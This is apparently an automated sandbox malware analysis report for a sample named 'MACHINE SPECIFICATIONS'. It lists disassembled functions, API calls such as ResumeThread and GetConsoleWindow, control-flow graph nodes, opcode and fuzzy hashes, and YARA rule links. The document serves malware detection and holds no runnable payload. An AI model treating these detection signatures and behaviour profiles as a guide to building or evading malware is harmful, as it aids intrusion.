                                                                                    • Opcode ID: 1975369381323d2e8a5219a10579e2a7f38405fc236a866785528b9a90461f43
                                                                                    • Instruction ID: 23cb90f4ca05a74b5136fd214f4d803df1aaf1fd0333c33c2c8fb654553b0497
                                                                                    • Opcode Fuzzy Hash: 1975369381323d2e8a5219a10579e2a7f38405fc236a866785528b9a90461f43
                                                                                    • Instruction Fuzzy Hash: 2E1158B1D002488FCB10DFAAD4847EEBBF5AB88328F24842DD519A7240CB74A945CFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F48D18 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ResumeThread.KERNELBASE(?), ref: 00F48D7A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268299661.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    • Opcode ID: 955f4cfb2ce376c64f135a809c919619e7720e175ed52e2db3cd60c7df3e3138
                                                                                    • Instruction ID: 77d908df4a0b63a1a8f8df1205fc9fd355ca73153eb21806b1641fcffbae7afe
                                                                                    • Opcode Fuzzy Hash: 955f4cfb2ce376c64f135a809c919619e7720e175ed52e2db3cd60c7df3e3138
                                                                                    • Instruction Fuzzy Hash: A21128B1D042488FCB10DFAAD4447EEBBF5AB88328F248419D519A7240DB74A945CBA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F009A0 Relevance: .3, Instructions: 296COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268224201.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f00000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8a083145308f8799316d1b7aba85a42702098d8e0054f822fdabf19373b809f7
                                                                                    • Instruction ID: f6bbb0ed04b0e65d84726d7a5d6d8b286ec17fc5b6888fc0bb4205ad3a253f0e
                                                                                    • Opcode Fuzzy Hash: 8a083145308f8799316d1b7aba85a42702098d8e0054f822fdabf19373b809f7
                                                                                    • Instruction Fuzzy Hash: C7C15B35D00109AFCB25DFA4CD80A9DBBB6FF09314F208065E619AB265DB32ED55EF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F00980 Relevance: .3, Instructions: 284COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268224201.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f00000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8706bd4eb18c0dc6d004c87feb49246ced8a4d45e3331416235b448fcdfebc9f
                                                                                    • Instruction ID: d323f0ecb9e3f692593b720a9e711346d4baaa8191721d7b4f6cdd5c05ebdaf0
                                                                                    • Opcode Fuzzy Hash: 8706bd4eb18c0dc6d004c87feb49246ced8a4d45e3331416235b448fcdfebc9f
                                                                                    • Instruction Fuzzy Hash: D3C15A35D00109AFCB11DFA4CD80A9DBBB6FF0A314F208066E619AB265DB31ED55EF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F01200 Relevance: .2, Instructions: 187COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268224201.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f00000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 13675332a4536b033c0122ed5525bca7cb1c0dd1a67753cf58b2aba2e5eee2c9
                                                                                    • Instruction ID: bbbbe84e33a14d0a680d8d62f06c8b43a143244e8be814f491afa8ed2a9f774f
                                                                                    • Opcode Fuzzy Hash: 13675332a4536b033c0122ed5525bca7cb1c0dd1a67753cf58b2aba2e5eee2c9
                                                                                    • Instruction Fuzzy Hash: 64719E39D00109DFCB01DF94DC8089DBBB6FF4A314B1580A6E515AB366DB31ED56EB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F011E0 Relevance: .2, Instructions: 176COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268224201.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f00000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f6bf8d99c476a2db8b0d160444d7d96408e72c271187a6c085b5592a0c0bf497
                                                                                    • Instruction ID: 868abb7ce9e26c8764c057d818025f81d27417b8eb490784d1a54767ee6ebf6e
                                                                                    • Opcode Fuzzy Hash: f6bf8d99c476a2db8b0d160444d7d96408e72c271187a6c085b5592a0c0bf497
                                                                                    • Instruction Fuzzy Hash: AE717C39E00109DFCB11DF94D88089DBBB6FF4A314B1180A6E515AB376D731ED56EB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F000DC Relevance: .1, Instructions: 149COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268224201.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f00000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 439aba47718a248185b20bb4c39b1f6e85f9e01b0cffe88ace9897440111dddd
                                                                                    • Instruction ID: c465b07cceb3b4a6eb4a91bbdecde2ae0d1dd75989a038c934585d847eae8465
                                                                                    • Opcode Fuzzy Hash: 439aba47718a248185b20bb4c39b1f6e85f9e01b0cffe88ace9897440111dddd
                                                                                    • Instruction Fuzzy Hash: 4451F731A0D3858FCB12CB68DC9499ABFB1EF47310B198097D555DB2A2CB359C05DBA2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F003A8 Relevance: .1, Instructions: 141COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268224201.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f00000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 596532207aff4dbc91f998dbe71be988a59e6c612bc251d7e74cb02a172f902a
                                                                                    • Instruction ID: db54be4820c59e18e269730a39d6a0b05cf303eb5ee560fdedcad6e434ef5893
                                                                                    • Opcode Fuzzy Hash: 596532207aff4dbc91f998dbe71be988a59e6c612bc251d7e74cb02a172f902a
                                                                                    • Instruction Fuzzy Hash: FC51CC31D04109AFCB11DFA4D880A9DFBB6FF4A304B1480A6E955AB262CB31ED15DFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F0038C Relevance: .1, Instructions: 127COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268224201.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f00000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5cd50f1db7ffd58851d12500152928aaf5efe15a6660b15e335713b94bf89130
                                                                                    • Instruction ID: 0155e28728e8b429f709f1104c322040d6d479f370508b6d132e5b5518dc1496
                                                                                    • Opcode Fuzzy Hash: 5cd50f1db7ffd58851d12500152928aaf5efe15a6660b15e335713b94bf89130
                                                                                    • Instruction Fuzzy Hash: CF518C35D00109AFCF00DFA4D880AEDBBB6FF4A314B148066E915AB265DB31ED15DFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F00190 Relevance: .1, Instructions: 99COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268224201.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f00000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 359893963a98587dae76f0b1e7117a29a345b2633da990985702ae41a39e9466
                                                                                    • Instruction ID: a2c1651c21beddacd46958c14613659d10fd64b716b0a57f05f1ea05ecad256f
                                                                                    • Opcode Fuzzy Hash: 359893963a98587dae76f0b1e7117a29a345b2633da990985702ae41a39e9466
                                                                                    • Instruction Fuzzy Hash: 3C41C231904249DFCB11DF64C894D9EBFB2FF4A310B05809AD549EB262DB359D05DB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F000A9 Relevance: .0, Instructions: 26COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268224201.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f00000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 36e6b856cc06be1f0246dde75b5024ca8c9d5d4b23a5d9cc33d1678948c21625
                                                                                    • Instruction ID: 629fdb0badce4fc53565ce116e9ac6ca1a7950b1cf51d339212cc179be6adfa8
                                                                                    • Opcode Fuzzy Hash: 36e6b856cc06be1f0246dde75b5024ca8c9d5d4b23a5d9cc33d1678948c21625
                                                                                    • Instruction Fuzzy Hash: DDF0F26500D7C14FCB239B289D16606BFB0AF0720134A84DA94C89B6A7E66A8D45C7E2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Function 00F45848 Relevance: .6, Instructions: 579COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268299661.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 78509f0538495cb398d7558f61a4dc25390ec0db000e28784952b7c5c76a930f
                                                                                    • Instruction ID: 4e33d08e2875202604a5ccd7adc7c5bca361e4777f48c97b76daec99bf6a80af
                                                                                    • Opcode Fuzzy Hash: 78509f0538495cb398d7558f61a4dc25390ec0db000e28784952b7c5c76a930f
                                                                                    • Instruction Fuzzy Hash: A3220531A042598FCB05CF68C4909AEBFF2FF85310B15C5AAE9499F266D734ED45CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00D9F470 Relevance: .4, Instructions: 421COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268173769.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_d90000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 33cc7705a84206354024544febcf2195cdcf162843a50ac86dc6123d136ac548
                                                                                    • Instruction ID: 3dba472ee259384bf65045d577ee686fa3e67ad9e03fb2803cab22b47257b894
                                                                                    • Opcode Fuzzy Hash: 33cc7705a84206354024544febcf2195cdcf162843a50ac86dc6123d136ac548
                                                                                    • Instruction Fuzzy Hash: 30E16532E14A06CBCF11CFA5C8411EEB3F2AF8E701B764565D541BB610D7B1AE86CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00D9DB08 Relevance: .1, Instructions: 91COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268173769.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_d90000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 907fc763acf16179e5be66e846b2cf373ae4bf1a1540ae857c93511cc9ad934e
                                                                                    • Instruction ID: 14e903bff327268b9f81aa20b1dcf296dc279e706ac36e0ee8584ea2efe9daed
                                                                                    • Opcode Fuzzy Hash: 907fc763acf16179e5be66e846b2cf373ae4bf1a1540ae857c93511cc9ad934e
                                                                                    • Instruction Fuzzy Hash: 98212B267483E60EFB158EBAAC513673AF36BC1358F0EC0769C54CB145DA6DC900D274
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Execution Graph

                                                                                    Execution Coverage:11.6%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:9
                                                                                    Total number of Limit Nodes:0
                                                                                    execution_graph 29043 16f04d8 29044 16f04fa 29043->29044 29048 16f08e8 29044->29048 29052 16f08e0 29044->29052 29045 16f053e 29049 16f0926 GetConsoleWindow 29048->29049 29051 16f0956 29049->29051 29051->29045 29053 16f0926 GetConsoleWindow 29052->29053 29055 16f0956 29053->29055 29055->29045

                                                                                    Executed Functions

                                                                                    Function 0580BE80 Relevance: 1.8, Strings: 1, Instructions: 588COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 815 580be80-580be8d 816 580bef1-580befa 815->816 817 580be8f-580be99 815->817 820 580bf04-580bf1f 816->820 821 580befc-580bf02 816->821 818 580beab-580beb5 817->818 819 580be9b-580bea3 817->819 824 580bebd-580bee9 818->824 819->818 829 580bf26-580bf30 820->829 821->820 824->829 836 580beeb-580bef0 824->836 830 580bf32-580bf38 829->830 831 580bf3b-580bfed 829->831 830->831 847 580c025-580c036 831->847 849 580c038-580c03c 847->849 850 580bfef-580c013 call 5802a98 847->850 851 580c079-580c080 849->851 852 580c03e-580c071 call 5809a38 call 5809a98 call 580a298 849->852 859 580c024 850->859 860 580c015-580c019 850->860 866 580c083-580c08d 852->866 867 580c073-580c077 852->867 859->847 860->859 862 580c01b-580c022 860->862 862->849 868 580c098-580c16c call 5809c18 call 5809a38 call 5809a98 call 580a298 866->868 869 580c08f-580c095 866->869 867->851 867->866 891 580c1e1-580c1e6 868->891 892 580c16e-580c170 868->892 869->868 893 580c1ce-580c1df 892->893 893->891 895 580c172-580c196 893->895 898 580c198-580c1ab call 5802a98 895->898 899 580c1cd 895->899 902 580c1b2 898->902 903 580c1ad-580c1b0 898->903 899->893 904 580c1b4-580c1b7 902->904 903->904 905 580c1c4 904->905 906 580c1b9-580c1c2 904->906 907 580c1c9-580c1cb 905->907 906->907 907->899 908 580c1e7-580c1f0 907->908 909 580c1f2-580c1f8 908->909 910 580c1fa-580c216 908->910 909->910 913 580c228-580c23c 910->913 914 580c218-580c220 910->914 917 580c24e-580c2f7 call 580a298 913->917 918 580c23e-580c246 913->918 914->913 931 580c2f9-580c309 call 580a298 917->931 932 580c30b-580c30f 917->932 918->917 931->932 935 580c310-580c319 931->935 936 580c323-580c3bb 935->936 937 580c31b-580c321 935->937 949 580c40b-580c410 936->949 950 580c3bd-580c3c1 936->950 937->936 951 580c3c3-580c3de 950->951 952 580c3e6-580c3f9 call 5802a98 950->952 951->952 952->949 956 580c3fb-580c3ff 952->956 958 580c411-580c41b 956->958 959 580c401-580c405 956->959 961 580c426-580c492 958->961 962 580c41d-580c423 958->962 959->949 960 580c499-580c4a3 959->960 963 580c4a5-580c4ab 960->963 964 580c4ae-580c541 960->964 961->960 962->961 963->964 984 580c579-580c58a 964->984 986 580c543-580c567 call 5802a98 984->986 987 580c58c-580c591 984->987 991 580c578 986->991 992 580c569-580c56d 986->992 991->984 992->991 993 580c56f-580c577 992->993
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: V
                                                                                    • API String ID: 0-1342839628
                                                                                    • Opcode ID: d0a8db0a8730f30ba5a43c07c729e3ca45a73912cf43a7035377fcfe10cc3e5a
                                                                                    • Instruction ID: 5ae8f32d14114922e41301cf2b2c7ec0672f8ced37c01b58a5c627d1cfb3a3fa
                                                                                    • Opcode Fuzzy Hash: d0a8db0a8730f30ba5a43c07c729e3ca45a73912cf43a7035377fcfe10cc3e5a
                                                                                    • Instruction Fuzzy Hash: 6622DB34B043049FDB55EB38C894A2EBBA7FF85214F15856AE806CB395DF34EC458B91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 058068F8 Relevance: 1.2, Instructions: 1221COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 48cea24f04db936a5307533bfbce03cd1b232f8806edbfea0747b9d56a528497
                                                                                    • Instruction ID: cd15ba7d9c157de7f3f861ed69f534cffcd0b10f7f70ab4058809215060a9bd7
                                                                                    • Opcode Fuzzy Hash: 48cea24f04db936a5307533bfbce03cd1b232f8806edbfea0747b9d56a528497
                                                                                    • Instruction Fuzzy Hash: 0C92EF35B042098FDB55ABB4C89463E76E7FFC8604F248429E906DB394EF74DC4A8B91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 058021D8 Relevance: .3, Instructions: 345COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2187 58021d8-58021ef 2189 58021f1-58021f3 2187->2189 2190 58021fd-5802208 2187->2190 2189->2190 2192 5802211-580221b 2190->2192 2193 580220a-5802210 2190->2193 2194 5802226-5802243 2192->2194 2195 580221d-5802223 2192->2195 2198 5802245 2194->2198 2199 5802248-58022de 2194->2199 2195->2194 2198->2199 2210 58022e0-58022f5 2199->2210 2211 580230a-5802313 2199->2211 2218 58022f7-5802307 2210->2218 2219 580233f-5802348 2210->2219 2212 5802315-580231b 2211->2212 2213 580231d-5802338 2211->2213 2212->2213 2213->2219 2221 5802352-580237a 2219->2221 2222 580234a-5802350 2219->2222 2228 580237c-58023d0 2221->2228 2222->2221 2235 58023d2-58023e5 2228->2235 2236 58023f5-5802400 2235->2236 2237 58023e7-58023f4 2235->2237 2238 5802402-5802408 2236->2238 2239 580240b-5802490 2236->2239 2238->2239 2248 5802492-58024a1 2239->2248 2249 58024d3-58024f2 2239->2249 2252 58024a3-58024ad 2248->2252 2253 58024c7-58024d0 2248->2253 2254 58024fb-5802507 2249->2254 2252->2253 2256 58024af-58024c5 2252->2256 2258 5802538-5802544 2254->2258 2259 5802509-5802515 2254->2259 2256->2249 2264 5802575-5802581 2258->2264 2265 5802546-5802552 2258->2265 2259->2258 2263 5802517-5802536 2259->2263 2269 58025b0-58025b9 2263->2269 2264->2269 2271 5802583-580258f 2264->2271 2265->2264 2270 5802554-5802573 2265->2270 2270->2269 2271->2269 2274 5802591-58025a7 2271->2274 2274->2269
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cf3a13be01bf7bc491dc2a00e2618659414f078e9f73f604063bf37e252e90b3
                                                                                    • Instruction ID: 4ea6df26a384063f29896ce8f4696936463e254b3610393aff15d15aeb470f35
                                                                                    • Opcode Fuzzy Hash: cf3a13be01bf7bc491dc2a00e2618659414f078e9f73f604063bf37e252e90b3
                                                                                    • Instruction Fuzzy Hash: 18C1A035B042049FCB45DF74D898A6ABBBAFF89354F1180A9E906CB3A1DB74DC05CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 05801D98 Relevance: .3, Instructions: 339COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2275 5801d98-5801dcb 2277 5801e07-5801e18 2275->2277 2279 5801e1a-5801e38 2277->2279 2280 5801dcd-5801dee 2277->2280 2287 5801fb6-5801fc8 2279->2287 2283 5801df0-5801dff 2280->2283 2284 5801e06 2280->2284 2283->2284 2284->2277 2289 5801e3d-5801e8c 2287->2289 2290 5801fce-5801fdf 2287->2290 2307 5801e99-5801e9f 2289->2307 2308 5801e8e-5801e97 2289->2308 2293 5801fe1-5802008 2290->2293 2294 580203a-5802040 2290->2294 2303 5802028-5802038 2293->2303 2304 580200a-5802021 2293->2304 2296 5802042-5802048 2294->2296 2297 580204a-580204d 2294->2297 2299 5802050-580209b 2296->2299 2297->2299 2315 58020a1-58020a6 2299->2315 2316 58021aa-58021ae 2299->2316 2303->2293 2303->2294 2304->2303 2310 5801ea2-5801eb6 2307->2310 2308->2310 2318 5801eb8-5801ebc 2310->2318 2319 5801f1a-5801f4d 2310->2319 2323 58020b0-5802101 2315->2323 2320 58021b0-58021b3 2316->2320 2321 58021be-58021c5 2316->2321 2318->2319 2322 5801ebe-5801edf 2318->2322 2333 5801f78-5801f7c 2319->2333 2334 5801f4f-5801f76 2319->2334 2320->2321 2331 5801fb3 2322->2331 2332 5801ee5-5801f13 2322->2332 2345 5802113 2323->2345 2346 5802103-5802111 2323->2346 2331->2287 2350 5801f15 2332->2350 2333->2331 2337 5801f7e-5801fab 2333->2337 2334->2333 2337->2331 2348 5802115-580211a 2345->2348 2346->2348 2351 5802175-5802177 2348->2351 2352 580211c-5802120 2348->2352 2350->2331 2353 5802194-58021a4 2351->2353 2354 5802179-580217b 2351->2354 2352->2353 2355 5802122-5802160 2352->2355 2353->2316 2353->2323 2356 5802189-580218b 2354->2356 2357 580217d-5802183 2354->2357 2366 5802168-5802173 2355->2366 2356->2353 2360 580218d 2356->2360 2358 5802185 2357->2358 2359 5802187 2357->2359 2358->2356 2359->2356 2360->2353 2366->2353
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cd8157d1163fd1ce286313d7b12af816f18a0975b7ddb0856ffaaedca2425142
                                                                                    • Instruction ID: 1f5b1c454679c3937f656dad1dc5c2bbcaffe5016a5a698eaca20100bcdea554
                                                                                    • Opcode Fuzzy Hash: cd8157d1163fd1ce286313d7b12af816f18a0975b7ddb0856ffaaedca2425142
                                                                                    • Instruction Fuzzy Hash: A2D14874B012099FCB54DF69D988A6EB7F2FF88314B548469E90ADB391DB30EC42CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 016F08E0 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 994 16f08e0-16f0954 GetConsoleWindow 997 16f095d-16f0982 994->997 998 16f0956-16f095c 994->998 998->997
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.365198404.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_16f0000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConsoleWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2863861424-0
                                                                                    • Opcode ID: 7310da207b3de6b06a69b95adeba8569eb978c3cb9d792060e32928399a02e44
                                                                                    • Instruction ID: a07df3438a08fdd920a51904b3e073227740f1d8cd46f8156f77a3f56aaedcbd
                                                                                    • Opcode Fuzzy Hash: 7310da207b3de6b06a69b95adeba8569eb978c3cb9d792060e32928399a02e44
                                                                                    • Instruction Fuzzy Hash: E8116A75D002098FCB10DFA9C9457EEBBF5EB48228F10941ED215A7250D738A545CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 016F08E8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1002 16f08e8-16f0954 GetConsoleWindow 1005 16f095d-16f0982 1002->1005 1006 16f0956-16f095c 1002->1006 1006->1005
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.365198404.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_16f0000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConsoleWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2863861424-0
                                                                                    • Opcode ID: 733134f1263ec1cd2860ce2e5660e84a43a2f6c4aa5b28b6a14e5f0041c58c23
                                                                                    • Instruction ID: 64007ab0adb48e1bd653f4696ed1536678f1c2de12246f26b36d4448b9b5c8fd
                                                                                    • Opcode Fuzzy Hash: 733134f1263ec1cd2860ce2e5660e84a43a2f6c4aa5b28b6a14e5f0041c58c23
                                                                                    • Instruction Fuzzy Hash: 421106719042098FDB10DFAAC8487EFBBF5EB48228F14841ED619A7640DB79A545CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 05808170 Relevance: 1.5, Strings: 1, Instructions: 233COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1010 5808170-580818e 1012 5808195-5808197 1010->1012 1013 5808199-580819e 1012->1013 1014 580819f-58081ad 1012->1014 1016 58081b5-58081ba 1014->1016 1017 58081af-58081b4 1014->1017 1018 58081c2-58081c5 1016->1018 1019 58081bc-58081c1 1016->1019 1020 58081c7-58081ca 1018->1020 1021 58081ff-5808208 1018->1021 1022 58081cc-58081d1 1020->1022 1023 58081dd-58081e2 1020->1023 1024 5808212-58082a1 1021->1024 1025 580820a-5808210 1021->1025 1022->1023 1026 58081d3-58081d7 1022->1026 1027 58081e4-58081ea 1023->1027 1028 58081f9-58081fe 1023->1028 1029 58082a8-58082b2 1024->1029 1025->1024 1026->1023 1026->1029 1030 58081f0-58081f3 1027->1030 1031 5808352-580835c 1027->1031 1034 58082b4-58082ba 1029->1034 1035 58082bd-580834b 1029->1035 1030->1028 1030->1031 1036 5808367-580847f 1031->1036 1037 580835e-5808364 1031->1037 1034->1035 1035->1031 1037->1036
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
